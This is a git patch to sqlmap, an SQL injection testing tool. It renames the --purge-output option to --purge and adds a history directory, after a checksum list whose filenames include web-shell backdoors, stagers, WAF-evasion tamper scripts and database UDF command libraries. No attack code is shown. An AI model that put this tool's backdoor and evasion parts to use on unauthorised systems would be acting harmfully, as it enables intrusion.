+4419b13a4b78d7e9e4a2632302344a1a plugins/generic/users.py +1e5532ede194ac9c083891c2f02bca93 plugins/__init__.py +5dc693e22f5d020c5c568d7325bd4226 shell/backdoors/backdoor.asp_ +158bfa168128393dde8d6ed11fe9a1b8 shell/backdoors/backdoor.aspx_ +595f711adf1ecb5f3b9a64532b04d8b9 shell/backdoors/backdoor.jsp_ +09fc3ed6543f4d1885e338b271e5e97a shell/backdoors/backdoor.php_ +ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ +4e6d2094bd6afe35032fb8bc8a86e83c shell/stagers/stager.aspx_ +0c48ddb1feb7e38a951ef05a0d48e032 shell/stagers/stager.jsp_ +2f9e459a4cf6a58680978cdce5ff7971 shell/stagers/stager.php_ +4eaeef94314956e4517e5310a28d579a sqlmapapi.py +b6e9d67cafb85ff2c3fde165fc577a8d sqlmap.py +1a1e3a78ded58b240c9dbb1b17996acf tamper/0x2char.py +4c3b8a7daa4bff52e01d4168be0eedbe tamper/apostrophemask.py +4115a55b8aba464723d645b7d3156b6e tamper/apostrophenullencode.py +d7e9a979eff4d7315d804a181e66fc93 tamper/appendnullbyte.py +0298d81e9dfac7ff18a5236c0f1d84b6 tamper/base64encode.py +9a3da4aa7b220448aa3ecbb92f68330f tamper/between.py +e1d2329adc6ca89828a2eaec2951806c tamper/bluecoat.py +e3cdf13caedb4682bee3ff8fac103606 tamper/chardoubleencode.py +3b2f68476fbcf8223199e8dd4ec14b64 tamper/charencode.py +b502023ac6c48e49e652ba524b8e18cc tamper/charunicodeencode.py +2c2b38974dc773568de7e7d771d7042c tamper/charunicodeescape.py +6a395de07b60f47d9474ace0a98c160f tamper/commalesslimit.py +211bb8fa36a6ecb42b719c951c362851 tamper/commalessmid.py +6082358eb328d1cdd4587e73c95bbefc tamper/commentbeforeparentheses.py +334e4a2485b3a1bbc1734823b93ea694 tamper/concat2concatws.py +dcdc433fe946f1b9005bcd427a951dd6 tamper/equaltolike.py +06df880df5d8749963f5562f60fd1637 tamper/escapequotes.py +4393cc5220d2e39c5c9c5a9af4e2635d tamper/greatest.py +25ec62158d3e289bda8a04c8b65686ba tamper/halfversionedmorekeywords.py +9d8c350cbb90d4b21ec9c9db184a213a tamper/htmlencode.py +3f79551baf811ff70b2ba8795a2064be tamper/ifnull2casewhenisnull.py +e2c2b6a67546b36983a72f129a817ec0 tamper/ifnull2ifisnull.py +21665e68ef9f91b2395e81d2f341412d tamper/informationschemacomment.py +1e5532ede194ac9c083891c2f02bca93 tamper/__init__.py +2dc49bcd6c55f4e2322b07fa92685356 tamper/least.py +1834b5409c449d2ea1b70a5038fed9eb tamper/lowercase.py +de4c83d33968a0cbf00cdfd8d35deddc tamper/modsecurityversioned.py +39981d5d6cb84aca950458739102bb07 tamper/modsecurityzeroversioned.py +5ee5147612ebe4769a67a8e2305d62f7 tamper/multiplespaces.py +be757e4c9a6fb36af7b9a8c444fddb05 tamper/nonrecursivereplacement.py +e298e486c06bb39d81f10d61a5c4ceec tamper/overlongutf8more.py +b9f698556f8333d9fa6eadaab44a77ab tamper/overlongutf8.py +bc0363e4fc04240c9f7b81e4ecce0714 tamper/percentage.py +91272e566ceb4644254cd6abd613db21 tamper/plus2concat.py +265314f4b3b921f4c0d470ddaa6506e4 tamper/plus2fnconcat.py +e94a1c7e4dc7450ac224436269d823bb tamper/randomcase.py +6368a971a80b1acbbbc6b76616bd96b9 tamper/randomcomments.py +48228322d40d97016b05e408c5234634 tamper/securesphere.py +cac8a56f8cc6c14524ee392daa5ae2fd tamper/space2comment.py +62d4d07b640d9d54d26ba33a77de9474 tamper/space2dash.py +ab91c20f71973b1a9a5fecfb9f2a1d1f tamper/space2hash.py +18f827afce8322adfa0c6dfbb4a59379 tamper/space2morecomment.py +59e61a9dd1f1e6b79fde026ed771cac4 tamper/space2morehash.py +ad45e799126d2d563b3958f714d2e7c6 tamper/space2mssqlblank.py +74334d72bffb99b0ac092f87f4da2675 tamper/space2mssqlhash.py +fd1bff6caefe5007444f7a0fabbc8ce9 tamper/space2mysqlblank.py +48a1f013657186e336d249adefbdbc7b tamper/space2mysqldash.py +36958b2a5f5915de8b7cc157a64b267a tamper/space2plus.py +6ce135f89259c379d84c85e538300091 tamper/space2randomblank.py +95c91853034d9e276a6570e4d01b5f74 tamper/sp_password.py +041cb567dff6bb6e7389e12ab3fb84c6 tamper/symboliclogical.py +6459c62914ae643799667de8bd283c97 tamper/unionalltounion.py +3b8182b8caef857b9af397e47d0c9938 tamper/unmagicquotes.py +371afb396f0bb18d97147c5db83354f4 tamper/uppercase.py +557ce5bf5ae9b7ab26f2c6b57312f41a tamper/varnish.py +929a2586dbb7b758a454eb09e13e5a73 tamper/versionedkeywords.py +3aff4d344ebd4f38e033e73b63f84447 tamper/versionedmorekeywords.py +ed1acafbac707bfa71c72f76b81c1bdd tamper/xforwardedfor.py +368165b45dadcdff4422bc010700832a thirdparty/ansistrm/ansistrm.py +d41d8cd98f00b204e9800998ecf8427e thirdparty/ansistrm/__init__.py +8e775c25bc9e84891ad6fcb4f0005c23 thirdparty/beautifulsoup/beautifulsoup.py +cb2e1fe7c404dff41a2ae9132828f532 thirdparty/beautifulsoup/__init__.py +ff54a1d98f0ab01ba7b58b068d2ebd26 thirdparty/bottle/bottle.py +4528e6a7bb9341c36c425faf40ef32c3 thirdparty/bottle/__init__.py +b20f539dc45fa9e514c1eb4f5aa8b5c6 thirdparty/chardet/big5freq.py +44159687c2bae35f165b44f07f5f167a thirdparty/chardet/big5prober.py +c80b09e2a63b375c02c8c1e825a953c5 thirdparty/chardet/chardetect.py +d2c4ad8cc905d95f148ead169d249eb8 thirdparty/chardet/chardistribution.py +24c57085435b8ad1a7bf9ff4ffe6cce0 thirdparty/chardet/charsetgroupprober.py +0cb6549c5cf979c8023f8aaf3392a117 thirdparty/chardet/charsetprober.py +241dd3b7d3eb97ae384320fc8346c6ff thirdparty/chardet/codingstatemachine.py +73f2b9ae331ab011571a3b3a2c62acc1 thirdparty/chardet/compat.py +6cccf2eada7dfa841a5c39aaecb037e7 thirdparty/chardet/constants.py +dd0087e46f835b791a5c9904fcda2de3 thirdparty/chardet/cp949prober.py +ecf56c6473c5a9bc0540a1ca11ec998a thirdparty/chardet/escprober.py +00590b3c94c4db8f25639ab261e4c725 thirdparty/chardet/escsm.py +99bc93e45136ecd15d8dfb489059f118 thirdparty/chardet/eucjpprober.py +65b6b3e75845e033ce34c11ccdd85450 thirdparty/chardet/euckrfreq.py +cc2282aef66a161b3451f9cf455fdd7d thirdparty/chardet/euckrprober.py +f13fee8c7bd6db0e8c40030ccacdfbde thirdparty/chardet/euctwfreq.py +ca66f5277872165faa5140068794604a thirdparty/chardet/euctwprober.py +0fb5414fcc0bdb8b04af324015505c06 thirdparty/chardet/gb2312freq.py +84284584b8e29f50f40781205a9d4e76 thirdparty/chardet/gb2312prober.py +354a83d1bb3c20b4626b6c4ad54d163a thirdparty/chardet/hebrewprober.py +d91ddc14e31824faacd96fa88e42a6b8 thirdparty/chardet/__init__.py +03be91b7ead4725af61234d4852bb7ab thirdparty/chardet/jisfreq.py +b59a7b8b0debe197444bf831ba42bbe9 thirdparty/chardet/jpcntx.py +e4e05437410aa80cf9a13afac19997fe thirdparty/chardet/langbulgarianmodel.py +74ce958cbef2eee08a7a04fb4db41260 thirdparty/chardet/langcyrillicmodel.py +7090da7635347b767b4eb194f697207d thirdparty/chardet/langgreekmodel.py +22df1e2996355e4c082cc0b2f8dbe261 thirdparty/chardet/langhebrewmodel.py +3b86d62fe73022a609b2e8095edecf87 thirdparty/chardet/langhungarianmodel.py +4f941425be84ee4e1b7ccb7c4b31e8d8 thirdparty/chardet/langthaimodel.py +9e7400a368b70c1acccab78d2cc489cd thirdparty/chardet/latin1prober.py +c27857a02a65a1100f3195f95c50aff9 thirdparty/chardet/mbcharsetprober.py +719ecf479d507a3e6450aefbaa42fcc8 thirdparty/chardet/mbcsgroupprober.py +2fd9f3c93568c552779bd46990027c36 thirdparty/chardet/mbcssm.py +93349a5fa5cb824d1485cd5f3a53928a thirdparty/chardet/sbcharsetprober.py +ee25f2a03587e2c283eab0b36c9e5783 thirdparty/chardet/sbcsgroupprober.py +c9349824f2647962175d321cc0c52134 thirdparty/chardet/sjisprober.py +bcae4c645a737d3f0e7c96a66528ca4a thirdparty/chardet/universaldetector.py +6f8b3e25472c02fb45a75215a175991f thirdparty/chardet/utf8prober.py +3c1b0d627e98643b317244ecfd240bb5 thirdparty/clientform/clientform.py +722281d87fb13ec22555480f8f4c715b thirdparty/clientform/__init__.py +0b625ccefa6b066f79d3cbb3639267e6 thirdparty/colorama/ansi.py +93bb7f06c8300a91b533ea55e8aead43 thirdparty/colorama/ansitowin32.py +ed4d76c08741d34ac79f6488663345f7 thirdparty/colorama/initialise.py +c0707ca77ccb4a2c0f12b4085057193c thirdparty/colorama/__init__.py +ad3d022d4591aee80f7391248d722413 thirdparty/colorama/win32.py +cdd682cbf77137ef4253b77a95ed9bd8 thirdparty/colorama/winterm.py +be7eac2e6cfb45c5e297ec5eee66e747 thirdparty/fcrypt/fcrypt.py +e00542d22ffa8d8ac894c210f38454be thirdparty/fcrypt/__init__.py +2f94ddd6ada38e4091e819568e7c4b7c thirdparty/gprof2dot/gprof2dot.py +855372c870a23d46683f8aa39d75f6a1 thirdparty/gprof2dot/__init__.py +d41d8cd98f00b204e9800998ecf8427e thirdparty/__init__.py +e3b18f925d125bd17c7e7a7ec0b4b85f thirdparty/keepalive/__init__.py +e0c6a936506bffeed53ce106ec15942d thirdparty/keepalive/keepalive.py +d41d8cd98f00b204e9800998ecf8427e thirdparty/magic/__init__.py +bf318e0abbe6b2e1a167a233db7f744f thirdparty/magic/magic.py +d41d8cd98f00b204e9800998ecf8427e thirdparty/multipart/__init__.py +03c8abc17b228e59bcfda1f11a9137e0 thirdparty/multipart/multipartpost.py +3e502b04f3849afbb7f0e13b5fd2b5c1 thirdparty/odict/__init__.py +127fe54fdb9b13fdac93c8fc9c9cad5e thirdparty/odict/odict.py +08801ea0ba9ae22885275ef65d3ee9dc thirdparty/oset/_abc.py +54a861de0f08bb80c2e8846579ec83bd thirdparty/oset/__init__.py +179f0c584ef3fb39437bdb6e15d9c867 thirdparty/oset/pyoset.py +94a4abc0fdac64ef0661b82aff68d791 thirdparty/prettyprint/__init__.py +ff80a22ee858f5331b0c088efa98b3ff thirdparty/prettyprint/prettyprint.py +5c70f8e5f7353aedc6d8d21d4fb72b37 thirdparty/pydes/__init__.py +a7f735641c5b695f3d6220fe7c91b030 thirdparty/pydes/pyDes.py +d41d8cd98f00b204e9800998ecf8427e thirdparty/socks/__init__.py +afd97f26bffa0532ee4eb4f5f8ec1ab7 thirdparty/socks/socks.py +d41d8cd98f00b204e9800998ecf8427e thirdparty/termcolor/__init__.py +ea649aae139d8551af513769dd913dbf thirdparty/termcolor/termcolor.py +bf55909ad163b58236e44b86e8441b26 thirdparty/wininetpton/__init__.py +a44e7cf30f2189b2fbdb635b310cdc0c thirdparty/wininetpton/win_inet_pton.py +855372c870a23d46683f8aa39d75f6a1 thirdparty/xdot/__init__.py +593473084228b63a12318d812e50f1e2 thirdparty/xdot/xdot.py +08c706478fad0acba049d0e32cbb6411 udf/mysql/linux/32/lib_mysqludf_sys.so_ +1501fa7150239b18acc0f4a9db2ebc0d udf/mysql/linux/64/lib_mysqludf_sys.so_ +70d83edb90c4a20bd95eb62f71c99bd0 udf/mysql/windows/32/lib_mysqludf_sys.dll_ +15aaa93872ca87366065568375ad8eb1 udf/mysql/windows/64/lib_mysqludf_sys.dll_ +0ee1310d4e2a4cc5a7295df01a3a78bf udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_ +c7d9e1fcac5f047edf17d79a825fb64b udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_ +ec41a080f4570c3866b9a7219f7623c4 udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_ +337e2b84dfb089d1ba78323ab2fd21bd udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_ +e3234ad91b65c476e69743b196ea8394 udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_ +2e39682ab7f7f9d6bcce6a3f9dac576b udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_ +b17ade3fe472b00f6d4d655f0d1036b2 udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_ +3dfc42ea62f5db4196a1b736c603ef0f udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_ +fe297bfe5e27e7f99d64b2d6baa766fe udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_ +d7ce763983f5ef4cdae07480c7e16c36 udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_ +f9e5d7a8f1fbd8df80d07f72ada0251b udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_ +10a20abaf98ff25527702c7e37187427 udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_ +0b5158292758f4a67cb1bdfcefcd4ef3 udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_ +1d8eb0e3d38f1265ea1bef7f9ec60230 udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_ +1222dac08cf53e31e74e350a2c17452f udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_ +27761c5e046da59f1f1e11f6d194e38a udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_ +a6b9c964f7c7d7012f8f434bbd84a041 udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_ +d9006810684baf01ea33281d21522519 udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_ +ca3ab78d6ed53b7f2c07ed2530d47efd udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ +0d3fe0293573a4453463a0fa5a081de1 udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ +336d0b0d2be333f5a6184042c85464fd waf/360.py +667cacdcd4ba650c9a436f081a79cd64 waf/airlock.py +7da7970b45512b0233450dbd8088fde0 waf/anquanbao.py +b61329e8f8bdbf5625f9520ec010af1f waf/armor.py +dec64f18c23962d279cc1cde6469afed waf/asm.py +6ea7b4ff5f111acb0b24186ef82c3f2d waf/aws.py +ef722d062564def381b1f96f5faadee3 waf/baidu.py +07bc4b531d2353c9acfbfcada94ff12b waf/barracuda.py +82efee4639f7be75041c0145a6bc8578 waf/bigip.py +6a2834daf767491d3331bd31e946d540 waf/binarysec.py +41e399dbfe7b904d5aacfb37d85e1fbf waf/blockdos.py +2f3bbf43be94d4e9ffe9f80e8483d62f waf/ciscoacexml.py +ba84f296cb52f5e78a0670b98d7763fa waf/cloudbric.py +21b8203fdaaaac3cb7c84fa4dc0627f6 waf/cloudflare.py +b16b1c15532103346d5e2f5b8bd1ed36 waf/cloudfront.py +ac96f34c254951d301973617064eb1b5 waf/comodo.py +56d58c982c2cf775e0f8dc6767f336fd waf/datapower.py +1538b661e35843074f4599be93b3fae9 waf/denyall.py +aade02eb8f6a4a214a53db0fd0f2aae6 waf/dosarrest.py +357cbc0a17a44e4f64062b799c718e0b waf/dotdefender.py +7ec3f2a90914b501100685aa66aadf02 waf/edgecast.py +954bebd4a246d8b88794de00ccaecd3b waf/expressionengine.py +a2ce6cde682f78e1fd561dc40611877e waf/fortiweb.py +eb56ac34775cc3c5f721ec967d04b283 waf/generic.py +1c70655551b8296ceeb19292a342e620 waf/hyperguard.py +525483047474e6f15d9898b525bdafd3 waf/incapsula.py +1e5532ede194ac9c083891c2f02bca93 waf/__init__.py +30ae98958fb35061d9a4145cc74c0489 waf/isaserver.py +5a5c9452b9779bf39c208ebe26c98fdb waf/jiasule.py +898f53c12133da3e946301f4aa97d538 waf/knownsec.py +81e6bf619c7bb73c4b62e2439e60e95a waf/kona.py +b17a154fe7959619eaafffa60e14199f waf/modsecurity.py +d09a50713daf3c0a2594ed4f50c57adb waf/naxsi.py +bf573d01d56e585f4ad57132bc594934 waf/netcontinuum.py +cb2f1516867684042f580e02138463de waf/netscaler.py +63b3cc819f432a32a403e24a00ab4d23 waf/newdefend.py +a925b2979c8e8aafb9e9a338ba4da6cf waf/nsfocus.py +ad7fe23004f8e0d02534c7baa877add3 waf/paloalto.py +856e34d47fedfe96039a6a7807f9605a waf/profense.py +166eb53544536e3e86223d513b8b688d waf/proventia.py +78a40eca7ddd14c4eaf911de7748b487 waf/radware.py +f5d53758d2008195609557112ce8e895 waf/requestvalidationmode.py +acb82b21f4032ceb510a58142add02ab waf/safe3.py +67cdf508e7b1f69ddf622a87e0e5e4e8 waf/safedog.py +d1b67820442199181815ec3fce27e582 waf/secureiis.py +34f0ec775835744bed601ef7c7a21c9d waf/senginx.py +1508a5200534b5273b66cecfd299e53e waf/sitelock.py +b088cf83c1a681d143e7eaea43f52b80 waf/sonicwall.py +4c412bc70007e6108d109e2911f2cefe waf/sophos.py +0e244e097a648158948dc8bb2351c781 waf/stingray.py +d5a5cef222f0e27f47bec3c4228e255e waf/sucuri.py +46224e3fa4b819da227c50fd45155823 waf/tencent.py +dffa9cebad777308714aaf83b71635b4 waf/teros.py +b37210459a13de40bf07722c4d032c33 waf/trafficshield.py +fe01932df9acea7f6d23f03c6b698646 waf/urlscan.py +a687449cd4e45f69e33b13d41e021480 waf/uspses.py +f3a81da13ee098e94edd965ea4b37b04 waf/varnish.py +20840afc269920826deac2b6c00d6b9c waf/wallarm.py +11205abf397ae9072adc3234b656ade9 waf/watchguard.py +9bf34539f382987490d2239d8ef0a651 waf/webappsecure.py +5b1eefdc39d449a74fce0564364b0e09 waf/webknight.py +11a5c6b10ced11e505a74e36ee2503b3 waf/wordfence.py +68e332530fab216d017ede506c3fec2f waf/yundun.py +bea35ba732ccc9548e6c4023cea6832b waf/yunsuo.py +705ac8663513c12150cb5623ef4a04fb waf/zenedge.py +dc394c5b90ada0a5d5853b5ad1f7d56d xml/banner/generic.xml +d8925c034263bf1b83e7d8e1c78eec57 xml/banner/mssql.xml +7b21aeb3ad66d7686eacd23a6346292c xml/banner/mysql.xml +9b262a617b06af56b1267987d694bf6f xml/banner/oracle.xml +c26cd4fa986ddc9f6d92dd87c8fc61cb xml/banner/postgresql.xml +4970709ca31bcaea5eb79547a132606a xml/banner/server.xml +d48c971769c6131e35bd52d2315a8d58 xml/banner/servlet-engine.xml +58be20a3b29a9108d043786907700469 xml/banner/set-cookie.xml +d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml +350605448f049cd982554123a75f11e1 xml/banner/x-aspnet-version.xml +817078783e1edaa492773d3b34d8eef0 xml/banner/x-powered-by.xml +fb93505ef0ab3b4a20900f3e5625260d xml/boundaries.xml +0d0d4bd0e06c99dd8eb4f92acc25caf3 xml/errors.xml +a279656ea3fcb85c727249b02f828383 xml/livetests.xml +3318571fac8df058f19ea85780606643 xml/payloads/boolean_blind.xml +b5b8b0aebce810e6cdda1b7106c96427 xml/payloads/error_based.xml +06b1a210b190d52477a9d492443725b5 xml/payloads/inline_query.xml +3194e2688a7576e1f877d5b137f7c260 xml/payloads/stacked_queries.xml +c2d8dd03db5a663e79eabb4495dd0723 xml/payloads/time_blind.xml +ac649aff0e7db413e4937e446e398736 xml/payloads/union_query.xml +a5eecbca03800851635817e0ca832a92 xml/queries.xml From 5e2d0bd320d48c39b76354b2873fe178135e1187 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 20 Jun 2018 23:52:08 +0200 Subject: [PATCH 185/428] Minor patches (--purge instead of --purge-output) --- lib/core/common.py | 13 +++++++----- lib/core/dicts.py | 1 + lib/core/option.py | 10 ++++----- lib/core/optiondict.py | 2 +- lib/core/settings.py | 2 +- lib/core/target.py | 48 ++++++++++++++++++++++-------------------- lib/parse/cmdline.py | 6 +++--- txt/checksum.md5 | 14 ++++++------ 8 files changed, 51 insertions(+), 45 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index ac6bc7b7a26..aef46a15498 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -1273,12 +1273,15 @@ def setPaths(rootPath): paths.SQLMAP_DUMP_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "dump") paths.SQLMAP_FILES_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "files") + # history files + paths.SQLMAP_HISTORY_PATH = getUnicode(os.path.join(_, "history"), encoding=sys.getfilesystemencoding() or UNICODE_ENCODING) + paths.API_SHELL_HISTORY = os.path.join(paths.SQLMAP_HISTORY_PATH, "api.hst") + paths.OS_SHELL_HISTORY = os.path.join(paths.SQLMAP_HISTORY_PATH, "os.hst") + paths.SQL_SHELL_HISTORY = os.path.join(paths.SQLMAP_HISTORY_PATH, "sql.hst") + paths.SQLMAP_SHELL_HISTORY = os.path.join(paths.SQLMAP_HISTORY_PATH, "sqlmap.hst") + paths.GITHUB_HISTORY = os.path.join(paths.SQLMAP_HISTORY_PATH, "github.hst") + # sqlmap files - paths.API_SHELL_HISTORY = os.path.join(_, "api.hst") - paths.OS_SHELL_HISTORY = os.path.join(_, "os.hst") - paths.SQL_SHELL_HISTORY = os.path.join(_, "sql.hst") - paths.SQLMAP_SHELL_HISTORY = os.path.join(_, "sqlmap.hst") - paths.GITHUB_HISTORY = os.path.join(_, "github.hst") paths.CHECKSUM_MD5 = os.path.join(paths.SQLMAP_TXT_PATH, "checksum.md5") paths.COMMON_COLUMNS = os.path.join(paths.SQLMAP_TXT_PATH, "common-columns.txt") paths.COMMON_TABLES = os.path.join(paths.SQLMAP_TXT_PATH, "common-tables.txt") diff --git a/lib/core/dicts.py b/lib/core/dicts.py index de05a87bd6a..4ea69a8a53c 100644 --- a/lib/core/dicts.py +++ b/lib/core/dicts.py @@ -281,6 +281,7 @@ "--auth-private": "use '--auth-file' instead", "--ignore-401": "use '--ignore-code' instead", "--second-order": "use '--second-url' instead", + "--purge-output": "use '--purge' instead", "--check-payload": None, "--check-waf": None, "--pickled-options": "use '--api -c ...' instead", diff --git a/lib/core/option.py b/lib/core/option.py index f0d0ed868f0..4d30bc0ce17 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -1638,13 +1638,13 @@ def _cleanupEnvironment(): if hasattr(socket, "_ready"): socket._ready.clear() -def _purgeOutput(): +def _purge(): """ - Safely removes (purges) output directory. + Safely removes (purges) sqlmap data directory. """ - if conf.purgeOutput: - purge(paths.SQLMAP_OUTPUT_PATH) + if conf.purge: + purge(paths.SQLMAP_HOME_PATH) def _setConfAttributes(): """ @@ -2450,7 +2450,7 @@ def init(): _setRequestFromFile() _cleanupOptions() _cleanupEnvironment() - _purgeOutput() + _purge() _checkDependencies() _createTemporaryDirectory() _basicOptionValidation() diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py index 54d781c4dea..e8c25ac627e 100644 --- a/lib/core/optiondict.py +++ b/lib/core/optiondict.py @@ -229,7 +229,7 @@ "identifyWaf": "boolean", "mobile": "boolean", "offline": "boolean", - "purgeOutput": "boolean", + "purge": "boolean", "skipWaf": "boolean", "smart": "boolean", "tmpDir": "string", diff --git a/lib/core/settings.py b/lib/core/settings.py index 92f318a2391..1a2581c74cd 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.35" +VERSION = "1.2.6.36" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/core/target.py b/lib/core/target.py index 4ab2e2cca55..c20adfb8faa 100644 --- a/lib/core/target.py +++ b/lib/core/target.py @@ -619,33 +619,35 @@ def _createTargetDirs(): Create the output directory. """ - try: - if not os.path.isdir(paths.SQLMAP_OUTPUT_PATH): - os.makedirs(paths.SQLMAP_OUTPUT_PATH) + for context in "output", "history": + directory = paths["SQLMAP_%s_PATH" % context.upper()] + try: + if not os.path.isdir(directory): + os.makedirs(directory) - _ = os.path.join(paths.SQLMAP_OUTPUT_PATH, randomStr()) - open(_, "w+b").close() - os.remove(_) + _ = os.path.join(directory, randomStr()) + open(_, "w+b").close() + os.remove(_) - if conf.outputDir: - warnMsg = "using '%s' as the output directory" % paths.SQLMAP_OUTPUT_PATH - logger.warn(warnMsg) - except (OSError, IOError), ex: - try: - tempDir = tempfile.mkdtemp(prefix="sqlmapoutput") - except Exception, _: - errMsg = "unable to write to the temporary directory ('%s'). " % _ - errMsg += "Please make sure that your disk is not full and " - errMsg += "that you have sufficient write permissions to " - errMsg += "create temporary files and/or directories" - raise SqlmapSystemException(errMsg) + if conf.outputDir and context == "output": + warnMsg = "using '%s' as the %s directory" % (directory, context) + logger.warn(warnMsg) + except (OSError, IOError), ex: + try: + tempDir = tempfile.mkdtemp(prefix="sqlmap%s" % context) + except Exception, _: + errMsg = "unable to write to the temporary directory ('%s'). " % _ + errMsg += "Please make sure that your disk is not full and " + errMsg += "that you have sufficient write permissions to " + errMsg += "create temporary files and/or directories" + raise SqlmapSystemException(errMsg) - warnMsg = "unable to %s output directory " % ("create" if not os.path.isdir(paths.SQLMAP_OUTPUT_PATH) else "write to the") - warnMsg += "'%s' (%s). " % (paths.SQLMAP_OUTPUT_PATH, getUnicode(ex)) - warnMsg += "Using temporary directory '%s' instead" % getUnicode(tempDir) - logger.warn(warnMsg) + warnMsg = "unable to %s %s directory " % ("create" if not os.path.isdir(directory) else "write to the", context) + warnMsg += "'%s' (%s). " % (directory, getUnicode(ex)) + warnMsg += "Using temporary directory '%s' instead" % getUnicode(tempDir) + logger.warn(warnMsg) - paths.SQLMAP_OUTPUT_PATH = tempDir + paths["SQLMAP_%s_PATH" % context.upper()] = tempDir conf.outputPath = os.path.join(getUnicode(paths.SQLMAP_OUTPUT_PATH), normalizeUnicode(getUnicode(conf.hostname))) diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index dcbf3d876a5..062f52c6f3a 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -643,8 +643,8 @@ def cmdLineParser(argv=None): miscellaneous.add_option("--offline", dest="offline", action="store_true", help="Work in offline mode (only use session data)") - miscellaneous.add_option("--purge-output", dest="purgeOutput", action="store_true", - help="Safely remove all content from output directory") + miscellaneous.add_option("--purge", dest="purge", action="store_true", + help="Safely remove all content from sqlmap data directory") miscellaneous.add_option("--skip-waf", dest="skipWaf", action="store_true", help="Skip heuristic detection of WAF/IPS/IDS protection") @@ -874,7 +874,7 @@ def _(self, *args): if args.dummy: args.url = args.url or DUMMY_URL - if not any((args.direct, args.url, args.logFile, args.bulkFile, args.googleDork, args.configFile, args.requestFile, args.updateAll, args.smokeTest, args.liveTest, args.wizard, args.dependencies, args.purgeOutput, args.sitemapUrl)): + if not any((args.direct, args.url, args.logFile, args.bulkFile, args.googleDork, args.configFile, args.requestFile, args.updateAll, args.smokeTest, args.liveTest, args.wizard, args.dependencies, args.purge, args.sitemapUrl)): errMsg = "missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --wizard, --update, --purge-output or --dependencies), " errMsg += "use -h for basic or -hh for advanced help\n" parser.error(errMsg) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 5ddc8ad89b0..5a53224d667 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -28,30 +28,30 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 0adf547455a76dc71e6a599e52da1ed9 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -6165b8a826803b29c479d47a60e8dbf6 lib/core/common.py +acec51826b280ad96dedbb56515e3988 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py 4086fb55f42e27de5330505605baad0f lib/core/decorators.py fbb55cc6100318ff922957b6577dc58f lib/core/defaults.py -98b730cef6a59ab044a108276aef6f42 lib/core/dicts.py +db165596ef0a3e19ec59c24192bb318d lib/core/dicts.py 9ea8a043030796e6faef7f7e957729d5 lib/core/dump.py ab3f4f3e3019add5f4a2e28f7e8748a4 lib/core/enums.py cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py -e9e32e5afe49ecd644b3a0ca9c9a36fc lib/core/optiondict.py -5d25911fbd379c32d5bf918c79febc0b lib/core/option.py +13c0a490b5a928b64236b4a15e578267 lib/core/optiondict.py +4ef6c718b5069f7468c647b5e29fd3db lib/core/option.py c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 6783160150b4711d02c56ee2beadffdb lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -4742105fe7dd3964e11961c44cf9e851 lib/core/settings.py +770a509eb586d686c1ca318171d17a33 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py -36bd2dc292c0e10e39bd9c43b77fe1bc lib/core/target.py +95f04c1c1d8c3998d86e1bdf0e12771c lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py de9922a29c71a235cb95a916ff925db2 lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f 